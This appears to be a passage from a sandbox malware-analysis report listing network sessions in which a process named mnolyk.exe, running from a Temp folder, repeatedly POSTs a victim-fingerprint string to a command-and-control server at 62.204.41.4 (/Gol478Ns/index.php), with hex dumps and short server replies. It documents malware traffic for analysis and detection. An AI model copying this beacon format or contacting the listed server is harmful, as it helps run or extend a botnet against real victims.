                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.090607882 CET | 342 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      228 | 192.168.2.7 | 49923 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:03.274770021 CET | 343 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.337419033 CET | 343 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      229 | 192.168.2.7 | 49924 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:03.524087906 CET | 344 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.586734056 CET | 344 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      23 | 192.168.2.7 | 49717 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:07.153402090 CET | 127 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.215212107 CET | 127 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      230 | 192.168.2.7 | 49925 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:03.782316923 CET | 345 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.847449064 CET | 345 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      231 | 192.168.2.7 | 49926 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:04.026093006 CET | 346 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.093128920 CET | 346 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      232 | 192.168.2.7 | 49927 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:04.272109985 CET | 347 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.337214947 CET | 347 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      233 | 192.168.2.7 | 49928 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:04.507544041 CET | 348 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.572125912 CET | 348 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      234 | 192.168.2.7 | 49929 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:04.773416042 CET | 349 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.839795113 CET | 349 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      235 | 192.168.2.7 | 49930 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:05.022670984 CET | 350 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.087532997 CET | 350 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      236 | 192.168.2.7 | 49931 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:05.263417006 CET | 351 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.328085899 CET | 351 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      237 | 192.168.2.7 | 49932 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:05.505650043 CET | 352 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.569046974 CET | 352 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      238 | 192.168.2.7 | 49933 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:05.759793043 CET | 353 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.823514938 CET | 353 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      239 | 192.168.2.7 | 49934 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:05.990362883 CET | 354 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.055263042 CET | 354 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      24 | 192.168.2.7 | 49718 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:07.389631987 CET | 128 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.452438116 CET | 128 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      240 | 192.168.2.7 | 49935 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:06.241909981 CET | 355 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.306998014 CET | 355 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      241 | 192.168.2.7 | 49936 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:06.480597973 CET | 356 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.544333935 CET | 356 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      242 | 192.168.2.7 | 49937 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:06.728827000 CET | 357 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.790683985 CET | 357 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      243 | 192.168.2.7 | 49938 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:06.973603964 CET | 358 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.040034056 CET | 358 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      244 | 192.168.2.7 | 49939 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:07.214342117 CET | 359 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
